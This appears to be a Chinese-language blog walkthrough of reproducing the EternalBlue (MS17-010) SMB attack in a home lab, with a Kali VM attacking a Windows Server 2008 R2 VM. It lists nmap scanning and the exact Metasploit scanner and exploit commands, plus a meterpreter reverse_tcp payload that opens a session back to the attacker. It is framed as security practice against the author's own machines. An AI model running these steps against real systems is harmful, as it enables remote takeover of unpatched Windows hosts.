目录
5.5使用 use exploit/windows/smb/psexec
1.安装靶机和攻击机
首先自己是在虚拟机完成的 靶场镜像地址MSDN, 我告诉你 - 做一个安静的工具站,我选择的win server 2008 R2 这里记得在安装虚拟机的时候选择桥接模式,这样你的虚拟机和物理机或者其他虚拟机都是一个网段的。
kali的下载地址:Get Kali | Kali Linux 在虚拟机里面直接选择打开就可以了。
攻击机 kali ip是192.168.3.138
靶机 win server 2008 R2 ip是192.168.3.147
2.永恒之蓝复现
1.首先知道你靶机和攻击机的IP地址
2.可以kali里面 用nmap扫描靶机开了那些端口,可以看到开了135,445,4915这些端口开放。这个命令会扫一下常用的端口是否开放哦
3.输入msfdb run 进入msf中,这利每次都会出现不一样的图案,感觉有种小惊喜。这次是一个鸭子。
4.开始搜索ms17_010 命令 search ms17_010
5.先使用aux模块扫描靶机有无漏洞 步骤如下
第一步 使用扫描模块 use auxiliary/scanner/smb/smb_ms17_010
第二步 查看那些参数需要设置 show options
第三步 设置靶机ip set RHOSTS 192.168.3.147
第四步 运行 run
如果看到Host is likely VULNERABLE to MS17-010! - Windows Server 2008 HPC Edition 7600 x64 (64-bit)表示该靶机很容易受到ms17-010的攻击
6.开始利用exploit模块进行攻击了。
第一步 使用攻击模块 use exploit/windows/smb/ms17_010_eternalblue
第二步 查看那些参数需要设置 show options
第三步 设置靶机ip set RHOSTS 192.168.3.147,
不需要设置payloads 因为我的kali自动就有设置好了,主要设置是攻击机的IP地址和端口,因为要建立会话,没有对象怎么谈恋爱呢。如果需要改动自己再设置。(怕有的人不会设置补充一下,set payload windows/x64/meterpreter/reverse_tcp.后面你跟你要使用的payload就可以了,可以通过shows payload查看所以payload)
第四步 运行 run
7.看到这个就是攻击成功了。建立了一个会话。